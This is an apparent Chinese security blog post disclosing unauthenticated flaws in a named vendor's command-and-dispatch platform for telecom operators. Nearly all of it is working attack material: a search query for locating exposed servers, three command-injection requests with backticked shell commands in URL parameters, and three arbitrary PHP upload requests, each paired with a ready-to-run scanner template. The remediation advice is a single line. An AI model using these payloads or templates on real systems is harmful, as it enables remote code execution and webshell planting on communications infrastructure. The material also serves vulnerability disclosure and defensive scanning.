某指挥调度管理平台存在多处漏洞
2023-12-28 19:20:57 Author: Tokaye安全(查看原文) 阅读量:10 收藏

免责声明

由于传播、利用本公众号"零漏安全"所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号"零漏安全"及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉谢谢!

一、简介

xxx指挥调度管理平台是一个专业针对通信行业的管理平台。该产品旨在提供高效的指挥调度喝管理解决方案,以帮助通信运营商或相关机构实现更好的运营效率和服务质量。该平台提供强大的指挥调度功能,可以实时监控和管理通信网络设备、维护人员和工作任务等。用户可以通过该平台发送指令、调度人员、分配任务。

二、漏洞描述

xxx指挥调度管理平台存在多处RCE、任意文件上传以及SQL注入等漏洞,未经身份认证的攻击者可通过上述等漏洞远程执行命令或写入后门等危害所导致服务器失陷。

三、复现环境

Query:body="指挥调度管理平台"

Demo1:invite_one_member接口RCE

Payload1:

GET /api/client/audiobroadcast/invite_one_member.php?callee=1&roomid=`id>1.txt` HTTP/1.1
Host: {{Hostname}}

Poc1:

id: 福建科立讯通信有限公司指挥调度管理平台RCE

info:
  name: 福建科立讯通信有限公司指挥调度管理平台RCE
  author: xxx
  severity: high
  description: description
  reference:
    - https://
  metadata:
    query: body="指挥调度管理平台"    
  tags: 

requests:
  - raw:
      - |+
        GET /api/client/audiobroadcast/invite_one_member.php?callee=1&roomid=`id>1.txt` HTTP/1.1
        Host: {{Hostname}}

      - |
        GET /api/client/audiobroadcast/1.txt HTTP/1.1
        Host: {{Hostname}}
        
    matchers:
      - type: dsl
        dsl:
          - contains(body_2,"uid")      

Example:

Demo2:invite2videoconf接口RCE

Payload2:

GET /api/client/invite2videoconf.php?callee=1&roomid=`id>1.txt` HTTP/1.1
Host: {{Hostname}}

Poc2:

id: 2福建科立讯通信有限公司指挥调度管理平台RCE

info:
  name: 2福建科立讯通信有限公司指挥调度管理平台RCE
  author: xxx
  severity: high
  description: description
  reference:
    - https://
  metadata:
    query: body="指挥调度管理平台"    
  tags: 

requests:
  - raw:
      - |+
        GET /api/client/invite2videoconf.php?callee=1&roomid=`id>1.txt` HTTP/1.1
        Host: {{Hostname}}

      - |
        GET /api/client/1.txt HTTP/1.1
        Host: {{Hostname}}
        
    matchers:
      - type: dsl
        dsl:
          - contains(body_2,"id")      

Example:

Demo3:invite_one_ptter接口RCE

Payload3:

GET /api/client/ptt/invite_one_ptter.php?callee=all&caller=1&pttnumber=`id>1.txt`&force=1&timeout=1 HTTP/1.1
Host: {{Hostname}}

Poc3:

id: 3福建科立讯通信有限公司指挥调度管理平台RCE

info:
  name: 3福建科立讯通信有限公司指挥调度管理平台RCE
  author: xxx
  severity: high
  description: description
  reference:
    - https://
  metadata:
    query: body="指挥调度管理平台"    
  tags: 

requests:
  - raw:
      - |+
        GET /api/client/ptt/invite_one_ptter.php?callee=all&caller=1&pttnumber=`id>1.txt`&force=1&timeout=1 HTTP/1.1
        Host: {{Hostname}}

      - |
        GET /api/client/ptt/1.txt HTTP/1.1
        Host: {{Hostname}}
        
    matchers:
      - type: dsl
        dsl:
          - contains(body_2,"id")      

Example:

Demo4:upload接口任意上传

Payload4:

        POST /api/client/upload.php HTTP/1.1
        Host: {{Hostname}}
        Content-Length: 180
        Cache-Control: max-age=0
        Upgrade-Insecure-Requests: 1
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundarySwvD8hSn3Z0sHfMu
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh;q=0.9
        Connection: close

        ------WebKitFormBoundarySwvD8hSn3Z0sHfMu
        Content-Disposition: form-data; name="ulfile";filename="1.php"
        Content-Type: image/png

        111
        ------WebKitFormBoundarySwvD8hSn3Z0sHfMu--

Poc4:

id: 指挥调度管理平台api/client-Upload

info:
  name: 指挥调度管理平台api/client-Upload
  author: xxx
  severity: info
  description: description
  reference:
    - http://
  tags: tags

requests:
  - raw:
      - |
        POST /api/client/upload.php HTTP/1.1
        Host: {{Hostname}}
        Content-Length: 180
        Cache-Control: max-age=0
        Upgrade-Insecure-Requests: 1
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundarySwvD8hSn3Z0sHfMu
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh;q=0.9
        Connection: close

        ------WebKitFormBoundarySwvD8hSn3Z0sHfMu
        Content-Disposition: form-data; name="ulfile";filename="1.php"
        Content-Type: image/png

        111
        ------WebKitFormBoundarySwvD8hSn3Z0sHfMu--

      - |
        GET /upload/1.php HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '111'
      - type: status
        status:
          - 200

Example:

Demo5:task-upload接口任意上传

Payload5:

        POST /api/client/task/uploadfile.php HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
        Connection: close
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary25qW4eG1Jt50iyf7
        Cookie: PHPSESSID=403fc14298f14704c52657fc5ff62c71
        Content-Length: 374

        ------WebKitFormBoundary25qW4eG1Jt50iyf7
        Content-Disposition: form-data; name="uuid"

        1
        ------WebKitFormBoundary25qW4eG1Jt50iyf7
        Content-Disposition: form-data; name="number"

        122
        ------WebKitFormBoundary25qW4eG1Jt50iyf7
        Content-Disposition: form-data; name="uploadfile";filename="1.php"
        Content-Type: image/jpg

        111
        ------WebKitFormBoundary25qW4eG1Jt50iyf7--

Poc5:

id: 指挥调度管理平台api/client/task/-Upload

info:
  name: 指挥调度管理平台api/client/task/-Upload
  author: xxx
  severity: info
  description: description
  reference:
    - http://
variables:
  tags: tags

requests:
  - raw:
      - |-
        POST /api/client/task/uploadfile.php HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
        Connection: close
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary25qW4eG1Jt50iyf7
        Cookie: PHPSESSID=403fc14298f14704c52657fc5ff62c71
        Content-Length: 374

        ------WebKitFormBoundary25qW4eG1Jt50iyf7
        Content-Disposition: form-data; name="uuid"

        1
        ------WebKitFormBoundary25qW4eG1Jt50iyf7
        Content-Disposition: form-data; name="number"

        122
        ------WebKitFormBoundary25qW4eG1Jt50iyf7
        Content-Disposition: form-data; name="uploadfile";filename="1.php"
        Content-Type: image/jpg

        111
        ------WebKitFormBoundary25qW4eG1Jt50iyf7--
      - |-
        GET /upload/task/{{timestrp}} HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        name: timestrp
        internal: true
        part: body
        regex:
          - '[0-9a-zA-Z]{8}-[0-9a-zA-Z]{4}-[0-9a-zA-Z]{4}-[0-9a-zA-Z]{4}-[0-9a-zA-Z]{12}.php'        
        

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 111
      - type: status
        status:
          - 200

Example:

Demo6:event/uploadfile接口任意上传

Payload6:

        POST /api/client/event/uploadfile.php HTTP/1.1
        Host: {{Hostname}}
        Cache-Control: max-age=0
        Upgrade-Insecure-Requests: 1
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh;q=0.9
        Connection: close
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary25qW4eG1Jt50iyf7
        Content-Length: 372

        ------WebKitFormBoundary25qW4eG1Jt50iyf7
        Content-Disposition: form-data; name="uuid"

        1
        ------WebKitFormBoundary25qW4eG1Jt50iyf7
        Content-Disposition: form-data; name="number"

        1
        ------WebKitFormBoundary25qW4eG1Jt50iyf7
        Content-Disposition: form-data; name="uploadfile";filename="1.php"
        Content-Type: image/png

        111
        ------WebKitFormBoundary25qW4eG1Jt50iyf7--

Poc6:

id: 指挥调度管理平台api/client/event-Uplaod

info:
  name: 指挥调度管理平台api/client/event-Uplaod
  author: xxx
  severity: info
  description: description
  reference:
    - http://
variables:
  tags: tags

requests:
  - raw:
      - |-
        POST /api/client/event/uploadfile.php HTTP/1.1
        Host: {{Hostname}}
        Cache-Control: max-age=0
        Upgrade-Insecure-Requests: 1
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh;q=0.9
        Connection: close
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary25qW4eG1Jt50iyf7
        Content-Length: 372

        ------WebKitFormBoundary25qW4eG1Jt50iyf7
        Content-Disposition: form-data; name="uuid"

        1
        ------WebKitFormBoundary25qW4eG1Jt50iyf7
        Content-Disposition: form-data; name="number"

        1
        ------WebKitFormBoundary25qW4eG1Jt50iyf7
        Content-Disposition: form-data; name="uploadfile";filename="1.php"
        Content-Type: image/png

        111
        ------WebKitFormBoundary25qW4eG1Jt50iyf7--

      - |-
        GET /upload/event/{{timestrp}} HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        name: timestrp
        internal: true
        part: body
        regex:
          - '[0-9a-zA-Z]{8}-[0-9a-zA-Z]{4}-[0-9a-zA-Z]{4}-[0-9a-zA-Z]{4}-[0-9a-zA-Z]{12}.php'        
        

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 111
      - type: status
        status:
          - 200

写在最后

交个朋友~

修复建议:

升级至安全版本~

长按二维码识别关注


文章来源: http://mp.weixin.qq.com/s?__biz=MzkzODMwOTE5NQ==&mid=2247483785&idx=1&sn=60735e7a6a42428a833eb076e1560308&chksm=c37a3b8b63e4bb82bcdc98beb191423332ac548f0d4cedeee85edb30a118fb83719dd98c47a1&scene=0&xtrack=1#rd
如有侵权请联系:admin#unsafe.sh